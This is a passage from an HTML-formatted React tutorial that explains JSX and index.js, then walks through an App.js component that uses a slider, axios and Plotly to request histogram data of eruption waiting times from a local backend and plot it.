&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-JSX" data-lang="JSX"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; element &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; (
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;h1&lt;/span&gt; className&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;greeting&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Hello, world&lt;span style="color:#ff7b72;font-weight:bold"&gt;!&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;h1&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-JSX" data-lang="JSX"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; element &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; React.createElement(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;h1&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {className&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;greeting&amp;#39;&lt;/span&gt;},
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Hello, world!&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;React doesn’t require using JSX, but most people find it helpful as a visual aid when working with user interfaces as it is structurally very similar to HTML.&lt;/p&gt;
&lt;p&gt;Further JSX information can be found &lt;a href="https://reactjs.org/docs/introducing-jsx.html" rel="external"&gt;here&lt;/a&gt;&lt;/p&gt;
&lt;h3 id="indexjs"&gt;index.js&lt;/h3&gt;
&lt;p&gt;The first file that we start with in a react project is index.js. It typically handles app startup and calls the Application component. It is the first file the web server seeks.
For the purpose of this tutorial we can leave the index.js file mostly as it comes. In the render function of index.js we see HTML like tags - the &amp;ldquo;&lt;code&gt;&amp;lt;App /&amp;gt;&lt;/code&gt;&amp;rdquo; tag calls our App component which is exported from App.js&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-JSX" data-lang="JSX"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; React from &lt;span style="color:#a5d6ff"&gt;&amp;#39;react&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; ReactDOM from &lt;span style="color:#a5d6ff"&gt;&amp;#39;react-dom&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;./index.css&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; App from &lt;span style="color:#a5d6ff"&gt;&amp;#39;./App&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; reportWebVitals from &lt;span style="color:#a5d6ff"&gt;&amp;#39;./reportWebVitals&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ReactDOM.render(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;React.StrictMode&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;App&lt;/span&gt; /&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;React.StrictMode&lt;/span&gt;&amp;gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; document.getElementById(&lt;span style="color:#a5d6ff"&gt;&amp;#39;root&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// If you want to start measuring performance in your app, pass a function
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// to log results (for example: reportWebVitals(console.log))
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// or send to an analytics endpoint. Learn more: https://bit.ly/CRA-vitals
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt;reportWebVitals();
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="appjs-component-full-code"&gt;App.js Component Full Code&lt;/h3&gt;
&lt;p&gt;For this tutorial we only really need to edit the App.js file to change the App component that Index.js uses.
In the src folder, we want to remove all the current code in App.js and replace it with the following, the code will be explained section by section after.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-JSX" data-lang="JSX"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; React from &lt;span style="color:#a5d6ff"&gt;&amp;#39;react&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;bootstrap/dist/css/bootstrap.min.css&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; { Container, Col, Row, Card } from &lt;span style="color:#a5d6ff"&gt;&amp;#39;react-bootstrap&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; axios from &lt;span style="color:#a5d6ff"&gt;&amp;#39;axios&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; Slider from &lt;span style="color:#a5d6ff"&gt;&amp;#39;rc-slider&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;rc-slider/assets/index.css&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; Plot from &lt;span style="color:#a5d6ff"&gt;&amp;#39;react-plotly.js&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; { debounce } from &lt;span style="color:#a5d6ff"&gt;&amp;#39;lodash&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;class&lt;/span&gt; App &lt;span style="color:#ff7b72"&gt;extends&lt;/span&gt; React.Component {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; constructor(props) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;super&lt;/span&gt;(props)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;this&lt;/span&gt;.state &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; };
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;this&lt;/span&gt;.onSliderChange &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;this&lt;/span&gt;.onSliderChange.bind(&lt;span style="color:#ff7b72"&gt;this&lt;/span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;async&lt;/span&gt; onSliderChange(input) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;await&lt;/span&gt; axios.get(&lt;span style="color:#a5d6ff"&gt;`http://localhost:8000/hist-raw`&lt;/span&gt;, {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; params&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; bins&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; input,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }).then((data) =&amp;gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;this&lt;/span&gt;.setState({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; rawdata&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; [
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; y&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; data.data.map(x =&amp;gt; x[&lt;span style="color:#a5d6ff"&gt;&amp;#34;counts&amp;#34;&lt;/span&gt;]),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; x&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; data.data.map(x =&amp;gt; x[&lt;span style="color:#a5d6ff"&gt;&amp;#34;mids&amp;#34;&lt;/span&gt;]),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; type&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;bar&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; });
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; render() {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; (
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;div&lt;/span&gt; className&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;App&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;Container&lt;/span&gt; fluid&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;Row&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;Col&lt;/span&gt; md&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;}&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;Card&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;Card.Body&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;Card.Title&lt;/span&gt;&amp;gt;Hello React&lt;span style="color:#ff7b72;font-weight:bold"&gt;!&lt;/span&gt;&amp;lt;/&lt;span style="color:#7ee787"&gt;Card.Title&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;Card.Text&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;label&lt;/span&gt; for&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;bins&amp;#34;&lt;/span&gt; class&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;col-form-label&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Number &lt;span style="color:#ff7b72"&gt;of&lt;/span&gt; bins&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;label&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;Slider&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; id&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a5d6ff"&gt;&amp;#34;bins&amp;#34;&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; onChange&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{debounce(&lt;span style="color:#ff7b72"&gt;this&lt;/span&gt;.onSliderChange, &lt;span style="color:#a5d6ff"&gt;60&lt;/span&gt;)}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; min&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; max&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a5d6ff"&gt;50&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; marks&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{{
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;1&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;13&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;13&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;26&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;26&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;38&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;38&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;50&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;50&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }} toolTipVisibleAlways&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#79c0ff"&gt;true&lt;/span&gt;} /&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;Card.Text&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;Card.Body&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;Card&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;Col&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;Col&lt;/span&gt; md&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a5d6ff"&gt;8&lt;/span&gt;}&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;Plot&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; data&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#ff7b72"&gt;this&lt;/span&gt;.state.rawdata}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; layout&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{{
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; title&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Histogram of waiting times&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; bargap&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0.01&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; autosize&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;true&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; xaxis&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; title&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Waiting time to next eruption (in mins)&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; },
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; yaxis&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; title&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Frequency&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; },
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; useResizeHandler&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;true&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; responsive&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;true&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; /&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;Col&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;Row&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;Container&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;div&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; );
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;export&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;default&lt;/span&gt; App;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="appjs-code-breakdown"&gt;App.js Code Breakdown&lt;/h3&gt;
&lt;p&gt;We will breakdown the above code the explain the individual elements&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-JSX" data-lang="JSX"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; React from &lt;span style="color:#a5d6ff"&gt;&amp;#39;react&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;bootstrap/dist/css/bootstrap.min.css&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; { Container, Col, Row, Card } from &lt;span style="color:#a5d6ff"&gt;&amp;#39;react-bootstrap&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; axios from &lt;span style="color:#a5d6ff"&gt;&amp;#39;axios&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; Slider from &lt;span style="color:#a5d6ff"&gt;&amp;#39;rc-slider&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;rc-slider/assets/index.css&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; Plot from &lt;span style="color:#a5d6ff"&gt;&amp;#39;react-plotly.js&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; { debounce } from &lt;span style="color:#a5d6ff"&gt;&amp;#39;lodash&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The above imports React components and css files from our node packages that we have installed through npm and allows us to use them in our App.js&lt;/p&gt;
&lt;h3 id="constructor"&gt;Constructor&lt;/h3&gt;
&lt;p&gt;Here we create and open a React component class with a constructor and initialize its state with an empty state object. A constructor is a function that runs when the component is created. We bind our onSliderChange function to the component instance, this binding is necessary to make the keyword &lt;code&gt;&amp;quot;this&amp;quot;&lt;/code&gt; work in the callback and allow us to pass through our OnClickEvent to a child component (in this case the Slider).&lt;/p&gt;
